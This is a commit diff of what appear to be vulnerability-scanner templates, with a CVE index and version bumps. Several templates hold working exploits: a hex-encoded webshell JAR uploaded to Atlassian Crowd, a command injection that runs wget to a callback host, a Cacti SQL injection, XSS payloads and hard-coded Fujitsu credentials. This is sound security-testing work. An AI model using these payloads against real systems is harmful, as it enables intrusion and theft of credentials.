Merge branch 'main' into remediations

patch-1
Prince Chaddha 2023-09-11 12:02:51 +05:30 committed by GitHub
commit cf900022f5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
231 changed files with 451 additions and 256 deletions

View File

@ -15,11 +15,16 @@ http/cves/2023/CVE-2023-32563.yaml
http/cves/2023/CVE-2023-34124.yaml
http/cves/2023/CVE-2023-34192.yaml
http/cves/2023/CVE-2023-36844.yaml
http/cves/2023/CVE-2023-38433.yaml
http/cves/2023/CVE-2023-39361.yaml
http/cves/2023/CVE-2023-39600.yaml
http/cves/2023/CVE-2023-4634.yaml
http/exposed-panels/aspcms-backend-panel.yaml
http/exposed-panels/dxplanning-panel.yaml
http/exposed-panels/greenbone-panel.yaml
http/exposed-panels/jorani-panel.yaml
http/exposed-panels/snapcomms-panel.yaml
http/exposures/apis/seafile-api.yaml
http/miscellaneous/external-service-interaction.yaml
http/miscellaneous/rdap-whois.yaml
http/misconfiguration/ecology-info-leak.yaml
@ -29,6 +34,8 @@ http/misconfiguration/nacos/nacos-create-user.yaml
http/misconfiguration/php-debugbar-exposure.yaml
http/osint/gist.yaml
http/takeovers/lemlist-takeover.yaml
http/technologies/burp-collaborator-detect.yaml
http/technologies/honeypot-detect.yaml
http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
http/technologies/wordpress/plugins/wp-seopress.yaml
@ -37,7 +44,9 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
http/vulnerabilities/jorani/jorani-benjamin-xss.yaml
http/vulnerabilities/other/huatian-oa8000-sqli.yaml
http/vulnerabilities/other/kingdee-erp-rce.yaml
http/vulnerabilities/other/landray-oa-datajson-rce.yaml
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
ssl/c2/mythic-c2-ssl.yaml
workflows/kev-workflow.yaml

View File

@ -615,7 +615,7 @@
{"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"}
{"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"}
{"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"}
{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"}
{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"}
{"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"}
{"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"}
{"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"}
@ -2004,12 +2004,15 @@
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-38433","Info":{"Name":"Fujitsu IP Series - Hardcoded Credentials","Severity":"high","Description":"Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38433.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"}
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"}
{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}

View File

@ -1 +1 @@
bf4766f6ec2eca9601df9f6f4b11e620
d3d61b5b23048ba01c949efdf8b4fe02

View File

@ -1 +1 @@
6.2.0
6.2.1

View File

@ -1 +1 @@
3.1.3
3.1.4

View File

@ -1 +1 @@
7.2.0
7.2.1

View File

@ -1 +1 @@
5.0.8
5.0.9

View File

@ -1 +1 @@
16.5.1
16.6.0

View File

@ -1 +1 @@
5.7.1
5.7.2

View File

@ -1 +1 @@
2.1.8
2.2.0

View File

@ -1 +1 @@
9.4.4
9.4.5.1

View File

@ -1 +1 @@
1.0.122
1.0.201.1

View File

@ -1 +1 @@
5.9.6
N/A

View File

@ -1 +1 @@
6.3.2
6.4.1

View File

@ -1 +1 @@
4.13.1
4.13.2

View File

@ -1,7 +1,7 @@
id: CVE-2019-11580
info:
name: Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution
name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
author: dwisiswant0
severity: critical
description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
@ -16,30 +16,40 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-11580
epss-score: 0.97501
epss-percentile: 0.99963
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
epss-score: 0.97491
metadata:
max-request: 1
vendor: atlassian
max-request: 2
product: crowd
shodan-query: http.component:"Atlassian Jira"
tags: packetstorm,kev,cve,cve2019,atlassian,rce
vendor: atlassian
tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth
variables:
plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'
http:
- method: GET
path:
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
- raw:
- |
POST /crowd/admin/uploadplugin.action HTTP/2
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
Expect: 100-continue
------------------------------f15fe87e95a7
Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
Content-Type: application/octet-stream
{{plugin}}
------------------------------f15fe87e95a7--
- |
GET /crowd/plugins/servlet/exp HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
part: body_2
words:
- "root:*:"
- "bin:*:"
condition: and
- type: status
status:
- 200
- "CVE-2019-11580"

View File

@ -39,6 +39,8 @@ http:
part: body
words:
- "<svg/onload=alert(document.domain)>"
- "<strong>IceWarp"
condition: and
- type: word
part: header

View File

@ -33,6 +33,7 @@ http:
path:
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction

View File

@ -0,0 +1,50 @@
id: CVE-2023-38433
info:
name: Fujitsu IP Series - Hardcoded Credentials
author: AdnaneKhan
severity: high
description: |
Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
reference:
- https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
- https://nvd.nist.gov/vuln/detail/CVE-2023-38433
- https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
- https://www.fujitsu.com/global/products/computing/peripheral/video/download
- https://jvn.jp/en/jp/JVN95727578
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cwe-id: CWE-798
metadata:
max-req: 1
max-request: 2
shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133'
verified: true
tags: cve,cve2023,fujitsu,ip-series
http:
- raw:
- |
GET /b_download/index.html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- fedish264pro
- fedish265pro
password:
- h264pro@broadsight
- h265pro@broadsight
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Field Support'
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: CVE-2023-39361
info:
name: Cacti 1.2.24 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg
- https://nvd.nist.gov/vuln/detail/CVE-2023-39361
classification:
cve-id: CVE-2023-39361
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
shodan-query: title:"Login to Cacti"
tags: cve,cve2023,cacti,sqli
http:
- raw:
- |
@timeout: 20s
GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=10'
- 'status_code == 200'
- 'contains_all(body, "Tree Mode", "cacti")'
condition: and

View File

@ -0,0 +1,47 @@
id: CVE-2023-39600
info:
name: IceWarp 11.4.6.0 - Cross-Site Scripting
author: Imjust0
severity: medium
description: |
IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
- https://nvd.nist.gov/vuln/detail/CVE-2023-39600
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-39600
cwe-id: CWE-79
epss-score: 0.0046
cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
epss-percentile: 0.72232
metadata:
max-request: 1
shodan-query: title:"icewarp"
vendor: icewarp
product: icewarp_server
tags: cve,cve2023,icewarp,xss
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=confirm(document.domain)>"
- "IceWarp"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,35 @@
id: dxplanning-panel
info:
name: DXPlanning Panel - Detect
author: righettod
severity: info
description: |
DXPlanning was detected.
reference:
- https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf
metadata:
max-request: 1
verified: true
tags: panel,dxplanning,login,detect
http:
- method: GET
path:
- '{{BaseURL}}/DxPlanning/WebBooking/Version'
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(tolower(body), 'dxplanning/webbooking/')"
- "contains(body, 'Webbooking</title>')"
- "status_code==200"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '<td>([0-9.]+)</td>'

View File

@ -0,0 +1,47 @@
id: seafile-api
info:
name: Seafile API - Detect
author: righettod
severity: info
description: |
Seafile API was detected.
reference:
- https://download.seafile.com/published/web-api/home.md
- https://manual.seafile.com/
- https://www.seafile.com/en/home/
metadata:
max-request: 1
verified: true
shodan-query: http.html:"seafile"
tags: exposure,api,detect
http:
- method: GET
path:
- '{{BaseURL}}/api2/server-info/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'seafile-basic'
- 'seafile-pro'
condition: or
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"version":\s*"([0-9.]+)"'

View File

@ -2,7 +2,7 @@ id: shopify-takeover
info:
name: shopify takeover detection
author: pdteam,philippedelteil
author: pdteam,philippedelteil,Imjust0
severity: high
reference:
- https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75
@ -28,6 +28,7 @@ http:
words:
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
- "Sorry, this shop is currently unavailable."
- "Sorry, this store is currently unavailable."
condition: or
- type: word

View File

@ -0,0 +1,42 @@
id: burp-collaborator-detect
info:
name: Burp Collaborator Server - Detect
author: lum8rjack
severity: info
description: |
Burp Collaborator server detected.
reference:
- https://portswigger.net/burp/documentation/collaborator
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
shodan-query: "Server: Burp Collaborator"
tags: burp,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Server: Burp Collaborator https://burpcollaborator.net/"
- type: status
status:
- 200
extractors:
- type: regex
part: header
group: 1
regex:
- "(?:X-(Collaborator-Version: [0-9]))"

View File

@ -0,0 +1,34 @@
id: honeypot-detect
info:
name: Honeypot Detection
author: j4vaovo
severity: info
description: |
Honeypot was Detected.
reference:
- https://github.com/zema1/yarx
metadata:
max-request: 1
tags: honeypot,tech,cti
variables:
rand1: "{{randstr}}"
rand2: "{{rand_int(11111, 99999)}}"
rand3: "{{randstr}}"
http:
- method: GET
path:
- "{{BaseURL}}/?{{rand1}}=../../../../../../../../etc/passwd&{{rand3}}=1%20and%20updatexml(1,concat(0x7e,(select%20md5({{rand2}}))),1)"
matchers-condition: or
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: body
words:
- '{{md5({{rand2}})}}'

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
max-request: 1
plugin_namespace: antispam-bee
